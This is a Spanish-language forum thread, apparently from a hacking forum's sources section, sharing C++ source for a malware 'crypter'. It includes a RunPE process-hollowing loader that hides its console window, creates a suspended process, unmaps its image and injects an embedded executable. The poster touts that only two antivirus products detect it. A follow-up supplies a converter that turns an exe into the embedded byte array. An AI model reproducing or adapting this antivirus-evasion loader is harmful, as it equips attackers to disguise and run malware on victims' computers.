Encontré este source de un crypter en C++ es detectado por 2 antivirus. Es basado en shellcode. Lo pueden modificar facilmente.

Aqui está el codigo de como se llama.
#include <Windows.h>
#define _WIN32_WINNT 0x0500
#include "runPE.h"
#include "shellcode.h"

int main()
{
HWND hWnd = GetConsoleWindow();
ShowWindow( hWnd, SW_HIDE );
	runPE rp;
	
	TCHAR szFilePath[1024];
	GetModuleFileNameA(0, LPSTR(szFilePath), 1024);
	rp.run(LPSTR(szFilePath), shellcode);
	return 0;
}
Aqui el runPE.h
typedef LONG (WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);

class runPE{
public:
void run(LPSTR szFilePath, PVOID pFile) 
{
	PIMAGE_DOS_HEADER IDH;     
	PIMAGE_NT_HEADERS INH;     
	PIMAGE_SECTION_HEADER ISH; 
	PROCESS_INFORMATION PI;    
	STARTUPINFOA SI;           
	PCONTEXT CTX;              
	PDWORD dwImageBase;        
	NtUnmapViewOfSection xNtUnmapViewOfSection;
	LPVOID pImageBase;         
	int Count;                 
	IDH = PIMAGE_DOS_HEADER(pFile);
	if (IDH->e_magic == IMAGE_DOS_SIGNATURE)
	{
		INH = PIMAGE_NT_HEADERS(DWORD(pFile) + IDH->e_lfanew);
		if (INH->Signature == IMAGE_NT_SIGNATURE)
		{
			RtlZeroMemory(&SI, sizeof(SI));
			RtlZeroMemory(&PI, sizeof(PI));
			if (CreateProcessA(szFilePath, NULL, NULL, NULL, FALSE, CREATE_SUSPENDED, NULL, NULL, &SI, &PI))
			{
				CTX = PCONTEXT(VirtualAlloc(NULL, sizeof(CTX), MEM_COMMIT, PAGE_READWRITE));
				CTX->ContextFlags = CONTEXT_FULL;
				if (GetThreadContext(PI.hThread, LPCONTEXT(CTX)))
				{
					ReadProcessMemory(PI.hProcess, LPCVOID(CTX->Ebx + 8), LPVOID(&dwImageBase), 4, NULL);
					if (DWORD(dwImageBase) == INH->OptionalHeader.ImageBase)
					{
						xNtUnmapViewOfSection = NtUnmapViewOfSection(GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection"));
						xNtUnmapViewOfSection(PI.hProcess, PVOID(dwImageBase));
					}
					pImageBase = VirtualAllocEx(PI.hProcess, LPVOID(INH->OptionalHeader.ImageBase), INH->OptionalHeader.SizeOfImage, 0x3000, PAGE_EXECUTE_READWRITE);
					if (pImageBase)
					{
						WriteProcessMemory(PI.hProcess, pImageBase, pFile, INH->OptionalHeader.SizeOfHeaders, NULL);
						for (Count = 0; Count < INH->FileHeader.NumberOfSections; Count++)
						{
							ISH = PIMAGE_SECTION_HEADER(DWORD(pFile) + IDH->e_lfanew + 248 + (Count * 40));
							WriteProcessMemory(PI.hProcess, LPVOID(DWORD(pImageBase) + ISH->VirtualAddress), LPVOID(DWORD(pFile) + ISH->PointerToRawData), ISH->SizeOfRawData, NULL);
						}
						WriteProcessMemory(PI.hProcess, LPVOID(CTX->Ebx + 8), LPVOID(&INH->OptionalHeader.ImageBase), 4, NULL);
						CTX->Eax = DWORD(pImageBase) + INH->OptionalHeader.AddressOfEntryPoint;
						SetThreadContext(PI.hThread, LPCONTEXT(CTX));
						ResumeThread(PI.hThread);
					}

				}
			}
		}
	}
	VirtualFree(pFile, 0, MEM_RELEASE);
}
};

Necesitan agregar shellcode.h que es su exe en shellcode y solo compilan y listo.
Perfect Hidden escribió:Gracias por el codigo!
tengo una duda, como puedo añadir el exe como shellcode.h?

Saludos
Generador de shellcode
#include <stdio.h>
#include <stdlib.h>

int main(int argc, char *argv[]){

    FILE *f;
    int i, c;
    char *arr_name;

    if (argc < 2) {
        fprintf(stderr, "Usage: %s input_file [array_name] [> output_file]\n", argv[0]);
        return 1;
    }
    f = fopen(argv[1], "rb");
    if (f == NULL) {
        fprintf(stderr, "%s: fopen(%s) failed", argv[0], argv[1]);
        return 1;
    }

    if (argc >= 3) arr_name=argv[2]; else arr_name="filedata";
    printf("unsigned char %s[] = {", arr_name);

    for (i=0;;i++) {
        if ((c = fgetc(f)) == EOF) break;
        if (i != 0) printf(",");
        if ((i % 12) == 0) printf("\n\t");
        printf("0x%.2X", (unsigned char)c);
    }

    printf("\n\t};\n");	
	printf("unsigned int size = %i;", i);
    fclose(f);
    return 0;
}
Al final te debe quedar un archivo shellcode.h que inicie asi
unsigned char shellcode[] = {
0x4D,0x5A,0x50,0x00,0x02,0x00,0x00,0x00,0x04,0x00,0x0F,0x00,
0xFF,0xFF,0x00,0x00,0xB8,0x00,0x00,0x00,0x00,0x00,0x00,0x00,
y que termine asi
,0x47,0x58
};
unsigned int size = 674304;
Responder

Volver a “Fuentes”